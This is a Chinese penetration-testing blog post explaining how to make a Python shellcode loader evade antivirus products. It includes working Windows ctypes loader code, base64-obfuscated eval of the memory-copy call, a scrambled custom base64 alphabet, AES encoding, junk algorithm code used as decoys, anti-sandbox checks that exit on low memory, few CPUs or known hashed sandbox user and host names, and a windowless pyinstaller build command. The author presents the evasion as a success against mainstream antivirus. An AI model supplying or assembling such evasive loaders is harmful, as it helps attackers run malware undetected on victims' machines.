1. 首页
  2. 红队技术

Python魔改加密免杀

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

前言

参考了几个python免杀得项目,自己也随手来实现一个,用于绕过国内主流杀软检测。

免杀最终效果图

Python魔改加密免杀

Python魔改加密免杀

Python魔改加密免杀

制作免杀

免杀首要的是选取shellcode加载器,一般就是网上搜一篇免杀文章选取相同得加载器即可。

import ctypes

#shellcode加载器
def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

if __name__ == "__main__":
    shellCodeLoad(bytearray(b'shellcode'))

测试下效果

Python魔改加密免杀

Python魔改加密免杀

很遗憾没有落地就死掉了。

增加一层base64编码尝试

import ctypes
import base64

def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    #ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

if __name__ == "__main__":
    shellCodeLoad(bytearray(b'shellcode'))

依然没有落地,看来这位大哥给得方法已经不太行了,很遗憾白嫖免杀失败得一天。

Python魔改加密免杀

魔改base64编码序列,编写base64模块修改自定义Base64编码使用的字符集,打乱排序编码规则,不使用python模块自实现base64加解密。

Python魔改加密免杀

Python魔改加密免杀

自定义Base64编码使用的字符集后,市面上base64解密无法对其进行解密、

Python魔改加密免杀

Leetcode拉取一些算法题目作为花指令,参考一些算法题。

Python魔改加密免杀

对所用shellcode加载器语法进行exec,AES编码,使用魔改base64对shellcode进行编码混淆两次。

Python魔改加密免杀

加入反沙箱逻辑(可以在github上白嫖开源免杀项目得反沙箱规则,伸手党复制粘贴即可),防止虚拟设备调试运行。

Python魔改加密免杀

def get_sanbox_users():
    users = ["3e93bb7b2887e4881fa7da105c8d95b1893a8373e2e24bee8460dcb69bd3cf04","2cd7b171d2155f0878a5b89ac6fea662241d05e7ef1555452a92006d2a7021f9","7707505e68f824301174b8824a9b9df32605193986fbcb61d0a18d0d28cf9e56","414efb531d1cb23f5778650492d0c7cae356a9633479ef59b1e2169ff9823265","8af67b85a6d66d4c84eb00dc9b4a662a88be1f6339c343f0f27403745ca5fec5","97c27f98cb4a1af26817b4137ef1baab09d6407e423cf1b99997289cc9786c38","14a3ca62b588cf9aa4e9164a4882d66fff67d0a09ba29aeca41b780583901370","cd5f0ac52ead5ad93bb7f732aabf554bf61f8a3070f50b02a91a7b3db99c3205","880473c8b0932cd60b918c0476ad84430739d77f4a01898bb214c842b7d25bd2","01568c005922d1a75fc61738c75c4546870ecc5a5571c83934ccab5ab4156ea8","d06b048d8ab08ee0778dd18bea5fe42b78dcb3bec7b6c57a3f029168e10edcd3","6cf318048779a91ef96bd2cd1ead164c12d1c57e0b2ffc27f4fa184242a960dd","b6ca2c4d97e775b984312c0c383097dd9b8beadbbb5d1f516441a0372b443d38","7f4d76ebe8a027c4d0f198f14971bf09400c9452efca9d458fef22be1b73118d","dcac8e623396c5f9459460209c55435ef52bb16424edf6da136ba84cd2b35982","e831df0ae56afd1a0a086d723e7876a7096428284c2efd40a611c4dece5d226c","9c4c99c53a93995dc9630b1c0b384955a71904c360e8596cef5811a9e45f2b8b","67f6331ef1bd6d094ce49dfdf2e9cd86e636c8aa88a6c9b86c86e9beb4d7f7b","709175a4a328264d72a2e92e16ffa4a6e6eadf72da354e3673f5e27cac92bf63","a0a3531a232f67d10627647ad48d0eb032d4b5dde05bf229cdbd5be6798747b5","6d376cff5c619aa02f76b8742c4b4eedd54ffa2582afedee465d150ba2b0b438","34ac133f0eac7f69b29f86eff4954c739203eaf4855b6c82a201f039268c937e","d3d3e02d666cabb5e26b33de344b5bb08095a1bd73be8201800b56f26ee29d38","1f3dfcc66198c87416e8004e33c932b94cfecac38732dd895e4324add7ab4c91","8a08da7c7ac2a709e019a97699d1a3f920680ad712207d23134426a53f0c95e4","3be0c9573bc4b1e81c26bbb77e00c4d585868fe44dcfce48c5924dea9f2b49ca","5a6e0bd92925b9f91ffec26805eb653f8d5117e8b4813248a87b55765729c0a2","f0b35713f16c4d9cfdbe4dc9b7cc7c8f24676e81cffe1150c8529205a4426d71","19203833e3dc9e0871ee98daa166f8817c2deedc44fd8371a55dc0119003ba5c","71bc0e605d52850557bf58f35f60f4deee63ceb2b2613d36e1a87f1a63483c3e","2da5c4ea837e60abf644c217ed0f360a1221d033b3ef7486ab267dc5ffa31841","dfca1dca8404208458945cc023a905306dc15e4680c0803055210bc71858ecdd","a6687db04a62d5b549b1fb9dbc42af981949aa2349a47ac3cc1128d2839ffe2e"]
    return users
def get_sanbox_computers():
    computers = ["3e93bb7b2887e4881fa7da105c8d95b1893a8373e2e24bee8460dcb69bd3cf04","2cd7b171d2155f0878a5b89ac6fea662241d05e7ef1555452a92006d2a7021f9","7707505e68f824301174b8824a9b9df32605193986fbcb61d0a18d0d28cf9e56","414efb531d1cb23f5778650492d0c7cae356a9633479ef59b1e2169ff9823265","8af67b85a6d66d4c84eb00dc9b4a662a88be1f6339c343f0f27403745ca5fec5","97c27f98cb4a1af26817b4137ef1baab09d6407e423cf1b99997289cc9786c38","14a3ca62b588cf9aa4e9164a4882d66fff67d0a09ba29aeca41b780583901370","cd5f0ac52ead5ad93bb7f732aabf554bf61f8a3070f50b02a91a7b3db99c3205","880473c8b0932cd60b918c0476ad84430739d77f4a01898bb214c842b7d25bd2","01568c005922d1a75fc61738c75c4546870ecc5a5571c83934ccab5ab4156ea8","d06b048d8ab08ee0778dd18bea5fe42b78dcb3bec7b6c57a3f029168e10edcd3","6cf318048779a91ef96bd2cd1ead164c12d1c57e0b2ffc27f4fa184242a960dd","b6ca2c4d97e775b984312c0c383097dd9b8beadbbb5d1f516441a0372b443d38","7f4d76ebe8a027c4d0f198f14971bf09400c9452efca9d458fef22be1b73118d","dcac8e623396c5f9459460209c55435ef52bb16424edf6da136ba84cd2b35982","e831df0ae56afd1a0a086d723e7876a7096428284c2efd40a611c4dece5d226c","9c4c99c53a93995dc9630b1c0b384955a71904c360e8596cef5811a9e45f2b8b","67f6331ef1bd6d094ce49dfdf2e9cd86e636c8aa88a6c9b86c86e9beb4d7f7b9","709175a4a328264d72a2e92e16ffa4a6e6eadf72da354e3673f5e27cac92bf63","a0a3531a232f67d10627647ad48d0eb032d4b5dde05bf229cdbd5be6798747b5","6d376cff5c619aa02f76b8742c4b4eedd54ffa2582afedee465d150ba2b0b438","34ac133f0eac7f69b29f86eff4954c739203eaf4855b6c82a201f039268c937e","d3d3e02d666cabb5e26b33de344b5bb08095a1bd73be8201800b56f26ee29d38","1f3dfcc66198c87416e8004e33c932b94cfecac38732dd895e4324add7ab4c91","8a08da7c7ac2a709e019a97699d1a3f920680ad712207d23134426a53f0c95e4","3be0c9573bc4b1e81c26bbb77e00c4d585868fe44dcfce48c5924dea9f2b49ca","5a6e0bd92925b9f91ffec26805eb653f8d5117e8b4813248a87b55765729c0a2","f0b35713f16c4d9cfdbe4dc9b7cc7c8f24676e81cffe1150c8529205a4426d71","19203833e3dc9e0871ee98daa166f8817c2deedc44fd8371a55dc0119003ba5c","71bc0e605d52850557bf58f35f60f4deee63ceb2b2613d36e1a87f1a63483c3e","2da5c4ea837e60abf644c217ed0f360a1221d033b3ef7486ab267dc5ffa31841","dfca1dca8404208458945cc023a905306dc15e4680c0803055210bc71858ecdd","a6687db04a62d5b549b1fb9dbc42af981949aa2349a47ac3cc1128d2839ffe2e"]
    return computers
def hash_name(i_str: str):
    i_str += "CanUGuessMe?"
    return sha256(i_str.encode()).hexdigest()
def check_vm():
    """
    反沙箱逻辑
    """
    total = round(psutil.virtual_memory().total / (1024.0 * 1024.0 * 1024.0), 2)
    pre = int(time.time())
    user = getuser()
    compuer = gethostname()
    time.sleep(2)
    now = int(time.time())
    if now-pre < 2:
        exit(1)
    if cpu_count() < 3:
        exit(0)
    if total < 2:
        exit(0)
    print(hash_name(user),get_sanbox_users())
    if hash_name(user) in get_sanbox_users():
        exit(0)
    if hash_name(compuer) in get_sanbox_computers():
        exit(0)

pyinstaller生成exe时,使用upx压缩缩减大小为6.68M,使用python制作免杀文件大小会比较大。

pyinstaller -i teaa.ico -F tesioa.py --noconsole --upx-dir=

Python魔改加密免杀

 

测试效果

Python魔改加密免杀

Python魔改加密免杀

Python魔改加密免杀

原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/8141.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息